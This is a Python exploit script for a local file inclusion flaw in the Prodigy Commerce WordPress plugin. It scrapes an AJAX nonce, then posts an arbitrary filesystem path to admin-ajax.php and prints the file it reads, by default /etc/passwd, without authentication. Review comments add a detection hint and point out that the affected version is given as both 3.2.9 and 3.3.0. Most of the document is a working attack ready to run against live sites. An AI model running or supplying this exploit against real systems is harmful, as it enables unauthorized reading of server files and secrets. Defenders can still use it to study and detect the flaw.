# Exploit Title: Prodigy Commerce 3.3.0 - Local File Inclusion
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://prodigycommerce.com/
# Software Link: https://wordpress.org/plugins/prodigy-commerce/
# Version: 3.2.9
# Tested on: Debian
# CVE : CVE-2026-0926
# Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion vulnerability caused by improper sanitization of the 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.
import httpx
import asyncio
import re
from urllib.parse import urljoin
import argparse
def get_nonce(base_url):
    """Fetch the site's front page and extract the plugin's AJAX nonce from its inline settings.

    Args:
        base_url: Site root to request (the value passed on the command line).

    Returns:
        The captured nonce string, or None (the function falls off the end) when the
        inline ``var settings = {...}`` object with a ``"nonce"`` key is not found.
    """
    # NOTE(review): verify=False disables TLS certificate verification for this request.
    with httpx.Client(verify=False) as client:
        r = client.get(url=base_url)
        # Looks for an inline `var settings = {...}` object and captures its "nonce" value.
        match = re.search(r'var settings\s*=\s*{[^}]*"nonce":"([^"]+)"', r.text)
        if match:
            nonce = match.group(1)
            return nonce
        else:
            # No explicit return on this path, so the caller receives None; main() does not check for it.
            print("Nonce not found")
async def main(base_url,file):
    """Request the plugin's my-account widget with ``file`` as the template name and print the returned HTML.

    Args:
        base_url: Site root; the POST goes to ``/wp-admin/admin-ajax.php`` beneath it.
        file: Value sent as ``parameters[template_name]``.

    Raises:
        Whatever ``r.json()`` raises when the body is not JSON, and KeyError when the
        response lacks ``data`` or ``data.html`` (for instance if the server rejects the request).
    """
    # NOTE(review): verify=False disables TLS certificate verification for the session.
    async with httpx.AsyncClient(verify=False) as client:
        # Synchronous nonce fetch run inside the event loop; its result (possibly None) is used unchecked.
        nonce = get_nonce(base_url)
        # Detection note: this is the request shape worth alerting on server-side — a POST to
        # admin-ajax.php with action=prodigy-render-my-account-widget whose
        # parameters[template_name] carries a filesystem path rather than a template name.
        data = {
            "action": "prodigy-render-my-account-widget",
            "nonce": nonce,
            "parameters[template_name]": file,
            "parameters[default_path]": "/"
        }
        # The leading '/' makes urljoin discard any path component of base_url.
        url = urljoin(base_url, '/wp-admin/admin-ajax.php')
        r = await client.post(url=url, data=data)
        raw = r.json()
        out = raw['data']
        # The included file's contents come back in the widget's rendered 'html' field.
        print(out['html'])
# CLI entry point. There is no `if __name__ == "__main__":` guard, so importing this
# module parses sys.argv and runs the request immediately.
# NOTE(review): the header comment gives the version as 3.2.9 while this description says
# 3.3.0 — confirm the affected range before relying on either.
parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit")
parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd")
parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local")
args = parser.parse_args()
asyncio.run(main(args.url, args.file))